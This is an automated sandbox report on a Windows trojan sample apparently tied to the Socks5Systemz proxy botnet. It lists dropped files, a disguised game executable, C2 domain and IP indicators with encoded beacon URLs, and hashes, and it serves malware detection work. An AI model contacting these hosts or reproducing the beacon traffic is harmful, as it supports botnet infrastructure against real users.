        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
        Process Injection
        1
        Timestomp
        NTDS35
        System Information Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets41
        Security Software Discovery
        SSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials21
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion
        DCSync11
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem1
        System Owner/User Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Process Injection
        /etc/passwd and /etc/shadow1
        Remote System Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Bootkit
        Network Sniffing1
        System Network Configuration Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        JtDj8LXROa.exe16%ReversingLabsWin32.Trojan.Munp
        SourceDetectionScannerLabelLink
        C:\ProgramData\Eurofighter Typhoon Game 10.8.45\Eurofighter Typhoon Game 10.8.45.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-044SQ.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-0GII4.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-3E0BT.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-45KG3.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-4931H.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-4D90I.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-4PF6P.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-8S82H.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-E99MS.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-F583D.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-FNN9L.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-HL3OV.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-J2GOF.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-JLHGP.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-KVJ9F.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-MIIEA.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-OINQS.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-QL93H.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-QREK9.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-R0B0H.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-RD9OC.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-RT5D9.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-S3DSP.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-T9B97.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-TITH4.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-U6VV1.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\is-UDOMJ.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk-win32-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk_pixbuf-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgdkmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libglibmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgmodule-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgobject-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgomp-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libgraphite2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libharfbuzz-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libintl-8.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libjpeg-8.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\liblcms2-2.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\liblzma-5.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpango-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpangocairo-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpangoft2-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpangomm-1.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpangowin32-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpcre-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpixman-1-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libpng16-16.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\librsvg-2-2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libsigc-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libtiff-5.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\libwinpthread-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Raff Txt To Sub\zlib1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_shfoldr.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        dioimyp.info
        185.208.158.248
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          dioimyp.infotrue
            unknown
            http://dioimyp.info/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf715c1e69c9e3ctrue
              unknown
              http://dioimyp.info/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211true
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-3J7FL.tmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drfalse
                • URL Reputation: safe
                unknown
                http://tukaani.org/is-FNN9L.tmp.1.drfalse
                  unknown
                  http://tukaani.org/xz/is-FNN9L.tmp.1.drfalse
                    unknown
                    http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82dtxttosub32_64.exe, 00000002.00000002.2985433217.0000000000B49000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://mingw-w64.sourceforge.net/Xis-044SQ.tmp.1.drfalse
                        unknown
                        http://185.208.158.248/txttosub32_64.exe, 00000002.00000002.2985433217.0000000000B49000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.remobjects.com/?psJtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drfalse
                            unknown
                            http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee948txttosub32_64.exe, 00000002.00000002.2987911275.0000000003392000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://fsf.org/JtDj8LXROa.exe, 00000000.00000003.1729957915.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000002.2985052299.0000000002088000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985152205.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1733440877.000000000227C000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1732936599.0000000003230000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985568481.000000000226C000.00000004.00001000.00020000.00000000.sdmpfalse
                                unknown
                                http://www.innosetup.comJtDj8LXROa.exefalse
                                  unknown
                                  http://www.innosetup.comDVarFileInfo$JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drfalse
                                    unknown
                                    http://www.gnu.org/licenses/JtDj8LXROa.exe, 00000000.00000003.1729957915.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000002.2985052299.0000000002088000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985152205.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1733440877.000000000227C000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1732936599.0000000003230000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985568481.000000000226C000.00000004.00001000.00020000.00000000.sdmp, is-HL3OV.tmp.1.drfalse
                                      unknown
                                      http://www.remobjects.com/?psUJtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.208.158.248
                                        dioimyp.infoSwitzerland
                                        34888SIMPLECARRER2ITtrue
                                        89.105.201.183
                                        unknownNetherlands
                                        24875NOVOSERVE-ASNLfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1529362
                                        Start date and time:2024-10-08 22:37:07 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 27s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:JtDj8LXROa.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:d05072998fa8197eea94c4d66dfb89f6.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@5/69@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 91%
                                        • Number of executed functions: 174
                                        • Number of non-executed functions: 226
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: JtDj8LXROa.exe
                                        TimeTypeDescription
                                        16:38:41API Interceptor344979x Sleep call for process: txttosub32_64.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.208.158.248file.exeGet hashmaliciousSocks5SystemzBrowse
                                          N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                            etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                              ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                  Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                    ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                      AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                                        0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                                          2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                                            89.105.201.183N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 200
                                                            cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 200
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            NOVOSERVE-ASNLfile.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            SxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            SIMPLECARRER2ITfile.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            logrotate_malware.elfGet hashmaliciousXmrigBrowse
                                                            • 185.196.8.41
                                                            N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            SxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.196.8.214
                                                            etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.196.8.214
                                                            ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            fHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.196.8.214
                                                            OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Raff Txt To Sub\is-044SQ.tmpfile.exeGet hashmaliciousSocks5SystemzBrowse
                                                              N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                                SxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        fHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                Process:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3295744
                                                                                Entropy (8bit):6.761851444843067
                                                                                Encrypted:false
                                                                                SSDEEP:24576:31FmlZTruZZAJwOo/l56wD4KmpIp8qUIOD8Voc2kSB3yHcOoCBw5F8qV3B/Xv26+:FKHZotmpNI3ICzd7pT+mEthKtgVUr
                                                                                MD5:B00E7D6666B62AB3475B654070B1BC1B
                                                                                SHA1:12215953D041D5F1916C5AC383E546990A2E95CC
                                                                                SHA-256:D698FE951989D3584AFB0B26CF3F73C5A3840746C186ED7555D0D4E032EE5AF5
                                                                                SHA-512:6AB91E96D236DBAA7252CE8C3A89257A281B16EDA4859396861051B86ACEF11E3BF336E063221A7A31F01C87C18D6FEA5B4B52099A9C58DDC98BD710F28DDF6A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...&M.L.................x...$......`2............@...........................2.......2..............................................P ..x..............................................................................4............................text....w.......x..................`....rdata...#.......$...|..............@..@.data...8........0..................@....rsrc....z...P ..z..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                File Type:International EBCDIC text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8
                                                                                Entropy (8bit):2.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Ti:Ti
                                                                                MD5:EB043B2004611F5A36A55D917A3FFEE4
                                                                                SHA1:CF71EA18B1E4E25097F2F8DB78F5EFE731B3D0E8
                                                                                SHA-256:15C44D93295F6FE40503A196954CADEBCE9AECB130F8CD01A8F1CA4B483AE021
                                                                                SHA-512:7925860BEF1F56DB48AF64F882FD5753DD413EFDBE5C80E645A160C466182B0EB77ED5CB386FC89FB5EC3C45AA71663E910FC6E0B4A09CE5E88285F30476FC12
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:k..g....
                                                                                Process:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):0.8112781244591328
                                                                                Encrypted:false
                                                                                SSDEEP:3:Q:Q
                                                                                MD5:9E14E7CA2409133A6CA029D332918DC4
                                                                                SHA1:395574A2BA8BAF066F6DDDA34B4223D08D1A49DE
                                                                                SHA-256:0009EA1DF10EDEB0E3B634AFE2F34B53463BC2E3155A4C3DF79654D475A38755
                                                                                SHA-512:7C38A24CD33C395F1DFB8303C888EC389E53A7EB71B143D0038CAE1AB6A47E641EDCDA032E6F6F2770DBD9F786D8FBF754C8AFDA49F454091A44B5D2C87B3F46
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:U...
                                                                                Process:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):128
                                                                                Entropy (8bit):2.9545817380615236
                                                                                Encrypted:false
                                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                Process:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):128
                                                                                Entropy (8bit):1.7095628900165245
                                                                                Encrypted:false
                                                                                SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                                MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                                SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                                SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                                SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):65181
                                                                                Entropy (8bit):6.085572761520829
                                                                                Encrypted:false
                                                                                SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: N6jsQ3XNNX.exe, Detection: malicious, Browse
                                                                                • Filename: SxohdOZiA2.exe, Detection: malicious, Browse
                                                                                • Filename: etwSnBeIC2.exe, Detection: malicious, Browse
                                                                                • Filename: jyU2NpOg5L.exe, Detection: malicious, Browse
                                                                                • Filename: ZFllSoXpoT.exe, Detection: malicious, Browse
                                                                                • Filename: fHeDaDg5FQ.exe, Detection: malicious, Browse
                                                                                • Filename: OTC71Ny3Ta.exe, Detection: malicious, Browse
                                                                                • Filename: Ui6sm6N5JG.exe, Detection: malicious, Browse
                                                                                • Filename: ITJ8wVQL5s.exe, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):30994
                                                                                Entropy (8bit):5.666281517516177
                                                                                Encrypted:false
                                                                                SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                                MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                                SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                                SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                                SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):441975
                                                                                Entropy (8bit):6.372283713065844
                                                                                Encrypted:false
                                                                                SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                                MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                                SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                                SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                                SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
